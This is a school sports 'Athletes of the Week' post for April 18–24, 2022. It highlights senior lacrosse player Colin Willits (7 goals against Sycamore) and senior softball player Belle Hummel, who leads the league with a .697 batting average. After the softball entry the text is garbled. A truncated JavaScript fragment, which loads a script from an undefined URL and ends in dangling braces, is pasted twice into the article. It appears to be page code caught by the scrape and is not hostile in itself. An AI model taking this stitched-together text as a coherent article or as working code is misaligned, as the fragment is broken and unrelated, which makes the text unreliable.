Athletes of the Week

Kemba Credit Union Athletes of the Week 4/18/2022-4/24/2022

Colin Willits
Senior, Lacrosse

Colin led the Firebirds to a 16-7 victory over Sycamore. Willits had 7 goals and caused 1 turnover.

 

 

 

 

 

 

Belle Hummel
Senior, Softball

Belle was on fire this past week, playing against Hamilton, Princeton, Sycamore, and Colerain. Hummel went 8-11 at the plate with eight runs, three RBIs, and seven stolen bases. Belle is currently leading the GMC with a .697 batting average.

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

const loadScriptWithTimeout = (url, timeout) => { return new Promise((resolve, reject) => { const script = document.createElement('script'); script.src = url; script.async = true;

script.onload = () => { clearTimeout(timer); resolve(); };

script.onerror = () => { clearTimeout(timer); reject(); };

const timer = setTimeout(() => { script.remove(); reject(); }, timeout);

document.body.appendChild(script); }); };

await loadScriptWithTimeout(scriptUrl, TIMEOUT_MS); } catch (_) {} })();

Popular Posts